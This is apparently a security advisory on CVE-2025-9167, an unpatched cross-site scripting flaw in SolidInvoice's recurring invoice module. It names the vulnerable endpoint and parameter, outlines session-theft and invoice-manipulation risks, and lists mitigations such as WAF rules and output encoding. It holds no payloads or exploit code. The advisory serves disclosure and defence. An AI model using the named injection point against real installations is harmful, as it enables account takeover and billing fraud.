CVE-2025-9167 is a cross-site scripting (XSS) vulnerability identified in SolidInvoice versions up to 2.4.0, specifically within the Recurring Invoice Module at the /invoice/recurring endpoint. The vulnerability arises from improper sanitization or validation of the 'client name' parameter, which an attacker can manipulate to inject malicious scripts. This flaw allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser when they access the affected page. The attack can be initiated remotely without authentication, requiring only user interaction (e.g., the victim visiting a crafted URL or viewing a manipulated invoice). The vendor has not responded to the disclosure, and no official patch or mitigation has been released as of the publication date. The CVSS 4.0 base score is 5.1 (medium severity), reflecting network attack vector, low attack complexity, no privileges required, but user interaction needed. The vulnerability impacts confidentiality and integrity to a limited extent by enabling session hijacking, credential theft, or unauthorized actions performed in the victim’s browser session. Availability impact is negligible. Although no known exploits are currently observed in the wild, public disclosure increases the risk of exploitation attempts.

For European organizations using SolidInvoice for invoicing and recurring billing, this vulnerability poses a moderate risk. Attackers could exploit the XSS flaw to steal session cookies, perform phishing attacks, or execute unauthorized actions on behalf of legitimate users. This could lead to financial fraud, leakage of sensitive client or invoice data, and reputational damage. Since SolidInvoice is a billing system, compromised sessions could allow attackers to manipulate invoices or payment details, impacting business operations and trust. The lack of vendor response and patches increases exposure duration. Organizations with customer bases in Europe, especially SMEs relying on SolidInvoice, are at risk of targeted attacks leveraging this vulnerability. Regulatory compliance such as GDPR may also be impacted if personal data is exposed or mishandled due to exploitation.

Given the absence of an official patch, European organizations should implement immediate compensating controls. These include input validation and output encoding on the client name field at the application or web server level to neutralize malicious scripts. Employing a Web Application Firewall (WAF) with custom rules to detect and block XSS payloads targeting the /invoice/recurring endpoint is recommended. Organizations should also restrict access to the invoicing module to trusted IP ranges or VPNs where feasible. User awareness training to recognize phishing attempts and suspicious invoice links can reduce successful exploitation. Monitoring web server logs for unusual query parameters or repeated access attempts to the vulnerable endpoint can help detect exploitation attempts early. Planning for an upgrade or migration to a patched or alternative invoicing solution is advised once available. Regular backups and incident response readiness will mitigate damage if exploitation occurs.